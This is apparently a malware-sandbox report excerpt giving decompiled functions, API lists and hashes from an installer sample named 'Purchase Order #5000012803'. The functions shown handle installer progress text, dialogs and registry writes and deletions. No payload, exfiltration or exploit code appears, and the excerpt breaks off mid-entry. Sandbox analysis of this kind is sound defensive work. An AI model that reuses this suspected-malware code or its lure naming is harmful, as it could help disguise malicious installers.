					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x423668, 0x41fc70);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x41fc70;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x41fc70)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x41fc70, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

















                      0x00404e29
                      0x00404e35
                      0x00404e38
                      0x00404e3e
                      0x00404e4a
                      0x00404e4d
                      0x00404e50
                      0x00404e56
                      0x00404e56
                      0x00404e5c
                      0x00404e64
                      0x00404e67
                      0x00404e84
                      0x00404e88
                      0x00404e91
                      0x00404e91
                      0x00404e9b
                      0x00404ea4
                      0x00404eb0
                      0x00404eb7
                      0x00404ebb
                      0x00404ebe
                      0x00404ed1
                      0x00404edf
                      0x00404edf
                      0x00404ee3
                      0x00404ee5
                      0x00404ee8
                      0x00000000
                      0x00404ee8
                      0x00404e69
                      0x00404e71
                      0x00404e79
                      0x00404e7f
                      0x00000000
                      0x00404e7f
                      0x00404e79
                      0x00404e67
                      0x00404ef2

                      APIs
                      • lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
                      • lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
                      • lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
                      • SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
                      • SendMessageA.USER32 ref: 00404EB7
                      • SendMessageA.USER32 ref: 00404ED1
                      • SendMessageA.USER32 ref: 00404EDF
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                      • String ID:
                      • API String ID: 2531174081-0
                      • Opcode ID: 6af7de6fb12d37621311d767828a5214a6e37c73fc4d498048a22c56ae339c00
                      • Instruction ID: 451019a1d205659c79ebfdec41688bb46c1145c2f0803241f2332644a3b6c24c
                      • Opcode Fuzzy Hash: 6af7de6fb12d37621311d767828a5214a6e37c73fc4d498048a22c56ae339c00
                      • Instruction Fuzzy Hash: 12217C71A00118BBCB119FA5DD809DFBFB9FB44354F00807AF904A6290C7394E45CF98
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004046F2, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E004046F2(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                      0x00404700
                      0x0040470d
                      0x00404713
                      0x00404751
                      0x00404751
                      0x00404760
                      0x00404767
                      0x00000000
                      0x00404769
                      0x00404715
                      0x00404724
                      0x0040472c
                      0x0040472f
                      0x00404741
                      0x00404747
                      0x0040474e
                      0x00000000
                      0x0040474e
                      0x00000000

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: Message$Send$ClientScreen
                      • String ID: f
                      • API String ID: 41195575-1993550816
                      • Opcode ID: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                      • Instruction ID: 77fe7446b7d437ffed3a300e181f1a5f8136abba45dafe536ab26234a61f9ca7
                      • Opcode Fuzzy Hash: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                      • Instruction Fuzzy Hash: 74014071D00219BADB01DBA4DD45BFEBBB8AB55711F10012ABA10B71C0D7B4A5018B95
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00402B2D, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00402B2D(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				void* _t11;
				CHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00402BA9();
					_t19 = "unpacking data: %d%%";
					if( *0x423eb0 == 0) {
						_t19 = "verifying installer: %d%%";
					}
					wsprintfA( &_v68, _t19, _t11);
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}






                      0x00402b3a
                      0x00402b48
                      0x00402b4e
                      0x00402b4e
                      0x00402b5c
                      0x00402b5e
                      0x00402b6a
                      0x00402b6f
                      0x00402b71
                      0x00402b71
                      0x00402b7c
                      0x00402b8c
                      0x00402b9e
                      0x00402b9e
                      0x00402ba6

                      APIs
                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B48
                      • wsprintfA.USER32 ref: 00402B7C
                      • SetWindowTextA.USER32(?,?), ref: 00402B8C
                      • SetDlgItemTextA.USER32 ref: 00402B9E
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: Text$ItemTimerWindowwsprintf
                      • String ID: unpacking data: %d%%$verifying installer: %d%%
                      • API String ID: 1451636040-1158693248
                      • Opcode ID: e04cdd19e0c63b62eaa7e8eced31868a1262f8adf0a2f46f7645d1242f1aea5d
                      • Instruction ID: 63589245c82b20a35a818b51aea08eb627593e3ecb5db54badb7bc3d6c1792f2
                      • Opcode Fuzzy Hash: e04cdd19e0c63b62eaa7e8eced31868a1262f8adf0a2f46f7645d1242f1aea5d
                      • Instruction Fuzzy Hash: F3F01D70900209ABEF215F50DD0ABAA3779BB04345F00803AFA06A91D1D7B9AA569B99
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004022F5, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71registrystringCOMMON
                      Download Yara Rule
                      C-Code - Quality: 90%
                      			E004022F5(void* __eax) {
				void* _t15;
				char* _t18;
				int _t19;
				char _t24;
				int _t27;
				intOrPtr _t35;
				void* _t37;

				_t15 = E00402ADD(__eax);
				_t35 =  *((intOrPtr*)(_t37 - 0x14));
				 *(_t37 - 0x30) =  *(_t37 - 0x10);
				 *(_t37 - 0x44) = E004029E8(2);
				_t18 = E004029E8(0x11);
				_t31 =  *0x423f50 | 0x00000002;
				 *(_t37 - 4) = 1;
				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27,  *0x423f50 | 0x00000002, _t27, _t37 + 8, _t27);
				if(_t19 == 0) {
					if(_t35 == 1) {
						E004029E8(0x23);
						_t19 = lstrlenA(0x40a368) + 1;
					}
					if(_t35 == 4) {
						_t24 = E004029CB(3);
						 *0x40a368 = _t24;
						_t19 = _t35;
					}
					if(_t35 == 3) {
						_t19 = E00402F01(_t31,  *((intOrPtr*)(_t37 - 0x18)), _t27, 0x40a368, 0xc00);
					}
					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x44), _t27,  *(_t37 - 0x30), 0x40a368, _t19) == 0) {
						 *(_t37 - 4) = _t27;
					}
					_push( *(_t37 + 8));
					RegCloseKey();
				}
				 *0x423f28 =  *0x423f28 +  *(_t37 - 4);
				return 0;
			}










                      0x004022f6
                      0x004022fb
                      0x00402305
                      0x0040230f
                      0x00402312
                      0x00402322
                      0x0040232c
                      0x00402333
                      0x0040233b
                      0x00402349
                      0x0040234d
                      0x00402358
                      0x00402358
                      0x0040235c
                      0x00402360
                      0x00402366
                      0x0040236b
                      0x0040236b
                      0x0040236f
                      0x0040237b
                      0x0040237b
                      0x00402394
                      0x00402396
                      0x00402396
                      0x00402399
                      0x0040246f
                      0x0040246f
                      0x00402880
                      0x0040288c

                      APIs
                      • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402333
                      • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsgB0E.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 00402353
                      • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsgB0E.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238C
                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsgB0E.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040246F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: CloseCreateValuelstrlen
                      • String ID: C:\Users\user\AppData\Local\Temp\nsgB0E.tmp
                      • API String ID: 1356686001-1971467431
                      • Opcode ID: 652f9a8a3f1dc98aeeeb98f906d59e2320e136a87a08436aae013fd7976f2720
                      • Instruction ID: c0f72d529a206c1f33eb9b8d59e365bb4fe54d10a3d93e78d78dba992e985e14
                      • Opcode Fuzzy Hash: 652f9a8a3f1dc98aeeeb98f906d59e2320e136a87a08436aae013fd7976f2720
                      • Instruction Fuzzy Hash: 0F1175B1E00118BFEB10AFA1DE4AEAF767CEB04758F10443AF505B71D0D6B99D019A69
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00402BC5, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00402BC5(intOrPtr _a4) {
				char _v68;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t14;

				if(_a4 != 0) {
					_t14 =  *0x417044; // 0x0
					if(_t14 != 0) {
						_t14 = DestroyWindow(_t14);
					}
					 *0x417044 = 0;
					return _t14;
				}
				__eflags =  *0x417044; // 0x0
				if(__eflags != 0) {
					return E00405DDC(0);
				}
				_t6 = GetTickCount();
				__eflags = _t6 -  *0x423eac;
				if(_t6 >  *0x423eac) {
					__eflags =  *0x423ea8;
					if( *0x423ea8 == 0) {
						_t7 = CreateDialogParamA( *0x423ea0, 0x6f, 0, E00402B2D, 0);
						 *0x417044 = _t7;
						return _t7;
					}
					__eflags =  *0x423f54 & 0x00000001;
					if(( *0x423f54 & 0x00000001) != 0) {
						wsprintfA( &_v68, "... %d%%", E00402BA9());
						return E00404E23(0,  &_v68);
					}
				}
				return _t6;
			}







                      0x00402bd1
                      0x00402bd3
                      0x00402bda
                      0x00402bdd
                      0x00402bdd
                      0x00402be3
                      0x00000000
                      0x00402be3
                      0x00402beb
                      0x00402bf1
                      0x00000000
                      0x00402bf4
                      0x00402bfb
                      0x00402c01
                      0x00402c07
                      0x00402c09
                      0x00402c0f
                      0x00402c4d
                      0x00402c53
                      0x00000000
                      0x00402c53
                      0x00402c11
                      0x00402c18
                      0x00402c29
                      0x00000000
                      0x00402c37
                      0x00402c18
                      0x00402c5a

                      APIs
                      • DestroyWindow.USER32(00000000,00000000), ref: 00402BDD
                      • GetTickCount.KERNEL32 ref: 00402BFB
                      • CreateDialogParamA.USER32(0000006F,00000000,00402B2D,00000000), ref: 00402C4D
                        • Part of subcall function 00402BA9: MulDiv.KERNEL32(000310F2,00000064,00032ABC), ref: 00402BBE
                      • wsprintfA.USER32 ref: 00402C29
                        • Part of subcall function 00404E23: lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
                        • Part of subcall function 00404E23: lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
                        • Part of subcall function 00404E23: lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
                        • Part of subcall function 00404E23: SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
                        • Part of subcall function 00404E23: SendMessageA.USER32 ref: 00404EB7
                        • Part of subcall function 00404E23: SendMessageA.USER32 ref: 00404ED1
                        • Part of subcall function 00404E23: SendMessageA.USER32 ref: 00404EDF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: MessageSend$Windowlstrlen$CountCreateDestroyDialogParamTextTicklstrcatwsprintf
                      • String ID: ... %d%%
                      • API String ID: 632923820-2449383134
                      • Opcode ID: 9ac0c74c1306bbd1fe40de56f6429fb106574e4c029b9f6bcf9b72350caeebfb
                      • Instruction ID: 259a824e759da58d6bdbd9050b41674a690fb301749dacda7e517d53f8420425
                      • Opcode Fuzzy Hash: 9ac0c74c1306bbd1fe40de56f6429fb106574e4c029b9f6bcf9b72350caeebfb
                      • Instruction Fuzzy Hash: 29019270909224EBDB216F60EF4C99F7B78AB047017104137F801B12D1C6BCA986C6EE
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00402A28, Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                      Download Yara Rule
                      C-Code - Quality: 84%
                      			E00402A28(void* _a4, char* _a8, intOrPtr _a12) {
				void* _v8;
				char _v272;
				long _t18;
				intOrPtr* _t27;
				long _t28;

				_t18 = RegOpenKeyExA(_a4, _a8, 0,  *0x423f50 | 0x00000008,  &_v8);
				if(_t18 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						if(_a12 != 0) {
							RegCloseKey(_v8);
							L8:
							return 1;
						}
						if(E00402A28(_v8,  &_v272, 0) != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E00405DA3(2);
					if(_t27 == 0) {
						if( *0x423f50 != 0) {
							goto L8;
						}
						_t28 = RegDeleteKeyA(_a4, _a8);
						if(_t28 != 0) {
							goto L8;
						}
						return _t28;
					}
					return  *_t27(_a4, _a8,  *0x423f50, 0);
				}
				return _t18;
			}








                      0x00402a49
                      0x00402a51
                      0x00402a79
                      0x00402a63
                      0x00402ab3
                      0x00402ab9
                      0x00000000
                      0x00402abb
                      0x00402a77
                      0x00000000
                      0x00000000
                      0x00402a77
                      0x00402a8e
                      0x00402a96
                      0x00402a9d
                      0x00402ac9
                      0x00000000
                      0x00000000
                      0x00402ad1
                      0x00402ad9
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00402ad9
                      0x00000000
                      0x00402aac
                      0x00402ac0

                      APIs
                      • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A49
                      • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A85
                      • RegCloseKey.ADVAPI32(?), ref: 00402A8E
                      • RegCloseKey.ADVAPI32(?), ref: 00402AB3
                      • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AD1
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: Close$DeleteEnumOpen
                      • String ID:
                      • API String ID: 1912718029-0
                      • Opcode ID: 188da090bc2c0dda3339140851fe508e253b0801d39640d6a2b0d173e59915d9
                      • Instruction ID: 7ac3799e0b9b7f286de12d9a89f233b53136cfd59643404f79253a10a0ceffad
                      • Opcode Fuzzy Hash: 188da090bc2c0dda3339140851fe508e253b0801d39640d6a2b0d173e59915d9
                      • Instruction Fuzzy Hash: AA115931A00009FEDF21AF90DE48DAB3B79EB44395B104536BA05A01A0DB749E51AE69
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00401CC1, Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00401CC1(int __edx) {
				void* _t17;
				struct HINSTANCE__* _t21;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 0x34), __edx);
				GetClientRect(_t25, _t27 - 0x40);
				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E004029E8(_t21), _t21,  *(_t27 - 0x38) *  *(_t27 - 0x1c),  *(_t27 - 0x34) *  *(_t27 - 0x1c), 0x10));
				if(_t17 != _t21) {
					DeleteObject(_t17);
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}







                      0x00401ccb
                      0x00401cd2
                      0x00401d01
                      0x00401d09
                      0x00401d10
                      0x00401d10
                      0x00402880
                      0x0040288c

                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                      • String ID:
                      • API String ID: 1849352358-0
                      • Opcode ID: 93d2110668d3094e167584d1b1b6540c5cd1076fe79007bc13e6d0e6a309afb7
                      • Instruction ID: ad5020e38ef11d08f371025551c7f23f007b957d45941c5b52acf933ea75ddf9
                      • Opcode Fuzzy Hash: 93d2110668d3094e167584d1b1b6540c5cd1076fe79007bc13e6d0e6a309afb7
                      • Instruction Fuzzy Hash: 31F0F9B2A04105BFD700EBA4EE89DAFB7BDEB44341B104476F601F21A0C7789D018B29
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00404610, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78stringCOMMON
                      Download Yara Rule
                      C-Code - Quality: 51%
                      			E00404610(int _a4, intOrPtr _a8, unsigned int _a12) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t26;
				void* _t34;
				signed int _t36;
				signed int _t39;
				unsigned int _t46;

				_t46 = _a12;
				_push(0x14);
				_pop(0);
				_t34 = 0xffffffdc;
				if(_t46 < 0x100000) {
					_push(0xa);
					_pop(0);
					_t34 = 0xffffffdd;
				}
				if(_t46 < 0x400) {
					_t34 = 0xffffffde;
				}
				if(_t46 < 0xffff3333) {
					_t39 = 0x14;
					asm("cdq");
					_t46 = _t46 + 1 / _t39;
				}
				_push(E00405AA7(_t34, 0, _t46,  &_v36, 0xffffffdf));
				_push(E00405AA7(_t34, 0, _t46,  &_v68, _t34));
				_t21 = _t46 & 0x00ffffff;
				_t36 = 0xa;
				_push(((_t46 & 0x00ffffff) + _t21 * 4 + (_t46 & 0x00ffffff) + _t21 * 4 >> 0) % _t36);
				_push(_t46 >> 0);
				_t26 = E00405AA7(_t34, 0, 0x420498, 0x420498, _a8);
				wsprintfA(_t26 + lstrlenA(0x420498), "%u.%u%s%s");
				return SetDlgItemTextA( *0x423678, _a4, 0x420498);
			}













                      0x00404618
                      0x0040461c
                      0x00404624
                      0x00404627
                      0x00404628
                      0x0040462a
                      0x0040462c
                      0x0040462f
                      0x0040462f
                      0x00404636
                      0x0040463c
                      0x0040463c
                      0x00404643
                      0x0040464e
                      0x0040464f
                      0x00404652
                      0x00404652
                      0x0040465f
                      0x0040466a
                      0x0040466d
                      0x0040467f
                      0x00404686
                      0x00404687
                      0x00404696
                      0x004046a6
                      0x004046c2

                      APIs
                      • lstrlenA.KERNEL32(00420498,00420498,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404530,000000DF,0000040F,00000400,00000000), ref: 0040469E
                      • wsprintfA.USER32 ref: 004046A6
                      • SetDlgItemTextA.USER32 ref: 004046B9
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: ItemTextlstrlenwsprintf
                      • String ID: %u.%u%s%s
                      • API String ID: 3540041739-3551169577
                      • Opcode ID: 219ed5be34c024fa703789d7f3e0b0a15268edc71ac5e8557b1e6afa8892d270
                      • Instruction ID: 4c66ffa9968b47036da968d2f23bae361eeba693da1d293f62fa9500f86314f5
                      • Opcode Fuzzy Hash: 219ed5be34c024fa703789d7f3e0b0a15268edc71ac5e8557b1e6afa8892d270
                      • Instruction Fuzzy Hash: 6211E6737001243BDB10A5699C45EAF3299DBC2335F14423BF625F61D1E9798C1186A9
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00401BAD, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                      Download Yara Rule
                      C-Code - Quality: 51%
                      			E00401BAD() {
				signed int _t28;
				CHAR* _t31;
				long _t32;
				int _t37;
				signed int _t38;
				int _t42;
				int _t48;
				struct HWND__* _t52;
				void* _t55;

				 *(_t55 - 0x34) = E004029CB(3);
				 *(_t55 + 8) = E004029CB(4);
				if(( *(_t55 - 0x10) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x34)) = E004029E8(0x33);
				}
				__eflags =  *(_t55 - 0x10) & 0x00000002;
				if(( *(_t55 - 0x10) & 0x00000002) != 0) {
					 *(_t55 + 8) = E004029E8(0x44);
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t50 = E004029E8();
					_t28 = E004029E8();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t31 =  ~( *_t27) & _t50;
					__eflags = _t31;
					_t32 = FindWindowExA( *(_t55 - 0x34),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
					goto L10;
				} else {
					_t52 = E004029CB();
					_t37 = E004029CB();
					_t48 =  *(_t55 - 0x10) >> 2;
					if(__eflags == 0) {
						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8));
						L10:
						 *(_t55 - 8) = _t32;
					} else {
						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8), _t42, _t48, _t55 - 8);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x24)) - _t42;
				if( *((intOrPtr*)(_t55 - 0x24)) >= _t42) {
					_push( *(_t55 - 8));
					E004059E3();
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t55 - 4));
				return 0;
			}












                      0x00401bb6
                      0x00401bc2
                      0x00401bc5
                      0x00401bce
                      0x00401bce
                      0x00401bd1
                      0x00401bd5
                      0x00401bde
                      0x00401bde
                      0x00401be1
                      0x00401be5
                      0x00401be7
                      0x00401c34
                      0x00401c36
                      0x00401c3f
                      0x00401c47
                      0x00401c4a
                      0x00401c4a
                      0x00401c53
                      0x00000000
                      0x00401be9
                      0x00401bf0
                      0x00401bf2
                      0x00401bfa
                      0x00401bfd
                      0x00401c25
                      0x00401c59
                      0x00401c59
                      0x00401bff
                      0x00401c0d
                      0x00401c15
                      0x00401c18
                      0x00401c18
                      0x00401bfd
                      0x00401c5c
                      0x00401c5f
                      0x00401c65
                      0x00402825
                      0x00402825
                      0x00402880
                      0x0040288c

                      APIs
                      • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C0D
                      • SendMessageA.USER32 ref: 00401C25
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp Download File
